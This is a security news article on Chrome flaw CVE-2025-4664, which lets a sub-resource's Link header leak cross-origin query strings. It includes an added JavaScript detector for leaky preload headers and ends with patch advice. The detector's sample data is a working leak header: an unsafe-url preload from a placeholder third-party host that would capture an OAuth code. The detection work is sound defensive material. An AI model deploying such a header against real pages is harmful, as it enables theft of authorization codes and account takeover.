Chrome Vulnerability Facilitates Cross-Origin Data Leakage Through Loader Referrer Policy


Google has issued updates to the Chrome web browser addressing four security vulnerabilities, one of which Google says has an exploit in the wild. That vulnerability, CVE-2025-4664, is rated High severity by Google even though its CVSS base score is 4.3 (Medium on the CVSS scale); it is attributed to insufficient policy enforcement in the browser component known as Loader.

The issue allows a remote attacker to leak cross-origin data through a specially crafted HTML page. The CVE record describes it as insufficient policy enforcement in Loader in Google Chrome prior to version 136.0.7103.113, which allowed a remote attacker to leak cross-origin data via a crafted HTML page.

Security researcher Vsevolod Kokorin (@slonser_) identified the flaw and published details of it on X (formerly Twitter) on May 5, 2025. Google's advisory accompanying the fix states that it is aware of reports that an exploit for CVE-2025-4664 exists in the wild.

Kokorin's explanation is that, unlike other browsers, Chrome processed the Link header on sub-resource responses, such as the response to an image load. A Link header can carry a referrerpolicy parameter; setting it to unsafe-url causes the follow-on request to send the full URL of the embedding page, query string included, as the Referer. Because query strings can hold sensitive values (an OAuth authorization code on a callback page, for example), a third-party image embedded on such a page could capture them, and in the worst case that leads to full account takeover. As Kokorin noted, developers rarely consider that query parameters can be stolen via an image loaded from a third-party resource.
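To make the referrer behaviour concrete, the following is an added example (not code from Chrome, Google or the researcher, and not part of the original article). It computes the Referer a browser would send for a cross-origin sub-resource request under each referrer policy, parses an HTTP Link header, and flags preload entries whose referrerpolicy would carry the embedding page's full URL to another origin. The page URL, image URL and Link header value are constructed samples; the function names are this example's own.

```javascript
// Referer value a browser sends for a request from pageUrl to targetUrl
// under `policy`, following the Referrer Policy spec's "determine request's
// referrer" algorithm (simplified: no local-scheme or length-limit handling).
function computeReferrer(pageUrl, targetUrl, policy) {
  const page = new URL(pageUrl);
  const target = new URL(targetUrl);
  const stripped = new URL(page);          // full URL minus userinfo and fragment
  stripped.username = ''; stripped.password = ''; stripped.hash = '';
  const full = stripped.href;
  const origin = page.origin + '/';        // origin-only form, e.g. https://app.example/
  const sameOrigin = page.origin === target.origin;
  const downgrade = page.protocol === 'https:' && target.protocol === 'http:';
  switch (policy || 'strict-origin-when-cross-origin') {
    case 'no-referrer': return null;
    case 'no-referrer-when-downgrade': return downgrade ? null : full;
    case 'origin': return origin;
    case 'origin-when-cross-origin': return sameOrigin ? full : origin;
    case 'same-origin': return sameOrigin ? full : null;
    case 'strict-origin': return downgrade ? null : origin;
    case 'strict-origin-when-cross-origin':
      return sameOrigin ? full : (downgrade ? null : origin);
    case 'unsafe-url': return full;
    default: throw new Error('unknown referrer policy: ' + policy);
  }
}

// Split `s` on `sep` while ignoring separators inside "quoted" values or
// inside the <angle-bracketed> URL of a Link header entry.
function splitOutside(s, sep) {
  const parts = []; let cur = '', inQuote = false, inAngle = false;
  for (const ch of s) {
    if (ch === '"' && !inAngle) inQuote = !inQuote;
    else if (ch === '<' && !inQuote) inAngle = true;
    else if (ch === '>' && !inQuote) inAngle = false;
    if (ch === sep && !inQuote && !inAngle) { parts.push(cur); cur = ''; } else cur += ch;
  }
  parts.push(cur);
  return parts;
}

// Parse an HTTP Link header (RFC 8288) into [{ target, params }].
// Parameter names are lower-cased; quoted values are unquoted;
// RFC 8187 extended (key*=) parameters are kept as raw strings.
function parseLinkHeader(value) {
  const links = [];
  for (const entry of splitOutside(value, ',')) {
    const m = entry.trim().match(/^<([^>]*)>(.*)$/s);
    if (!m) continue;
    const params = {};
    for (const p of splitOutside(m[2], ';')) {
      const eq = p.indexOf('=');
      const k = (eq === -1 ? p : p.slice(0, eq)).trim().toLowerCase();
      if (!k) continue;
      let v = eq === -1 ? '' : p.slice(eq + 1).trim();
      if (v.length >= 2 && v.startsWith('"') && v.endsWith('"')) v = v.slice(1, -1);
      params[k] = v;
    }
    links.push({ target: m[1], params });
  }
  return links;
}

// Policies under which an https -> https cross-origin request carries the
// page's full URL, query string included, as the Referer.
const FULL_URL_POLICIES = new Set(['unsafe-url', 'no-referrer-when-downgrade']);

// pageUrl: the document that embedded the sub-resource; responseUrl: the
// sub-resource whose response carried linkHeader (Link targets resolve
// against it). Returns preload entries that would send the page's full URL
// to a different origin, with the Referer value that would be sent.
function findLeakyPreloads(pageUrl, responseUrl, linkHeader) {
  const pageOrigin = new URL(pageUrl).origin;
  const findings = [];
  for (const { target, params } of parseLinkHeader(linkHeader)) {
    const rels = (params.rel || '').toLowerCase().split(/\s+/);
    if (!rels.includes('preload')) continue;
    const policy = (params.referrerpolicy || '').toLowerCase();
    if (!FULL_URL_POLICIES.has(policy)) continue;
    const resolved = new URL(target, responseUrl);
    if (resolved.origin === pageOrigin) continue;      // same-origin target: no cross-origin leak
    const referer = computeReferrer(pageUrl, resolved.href, policy);
    if (referer !== null) findings.push({ target: resolved.href, policy, referer });
  }
  return findings;
}

// Constructed sample: an OAuth-style callback page that embeds a third-party
// image, and the Link header that image's server returns.
const PAGE = 'https://app.example/oauth/callback?code=AUTHCODE123&state=xyz';
const IMAGE_RESPONSE = 'https://cdn.third-party.example/avatar.png';
const LINK = '</collect.gif>; rel=preload; as=image; referrerpolicy="unsafe-url", ' +
             '<https://fonts.example/f.woff2>; rel=preload; as=font; crossorigin';

console.log(JSON.stringify(findLeakyPreloads(PAGE, IMAGE_RESPONSE, LINK), null, 2));
```

Under Chrome's default policy of strict-origin-when-cross-origin the same request would carry only `https://app.example/`; the unsafe-url entry is what turns the image load into a query-string exfiltration channel. Run over recorded proxy responses, `findLeakyPreloads` is a cheap way to spot third-party resources that were attempting this against pages whose URLs carry secrets.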

It remains unclear whether the vulnerability has been used in malicious attacks beyond the published proof of concept. CVE-2025-4664 follows another recent high-risk Chrome issue, CVE-2025-2783, which Google patched in March 2025 after it too was exploited in the wild.

To mitigate the risk, users should update Chrome to version 136.0.7103.113 or 136.0.7103.114 on Windows and macOS, and to version 136.0.7103.113 on Linux. Because the affected Link header handling is Chromium behaviour, users of other Chromium-based browsers, such as Microsoft Edge, Brave, Opera, and Vivaldi, should also apply the corresponding updates as they become available.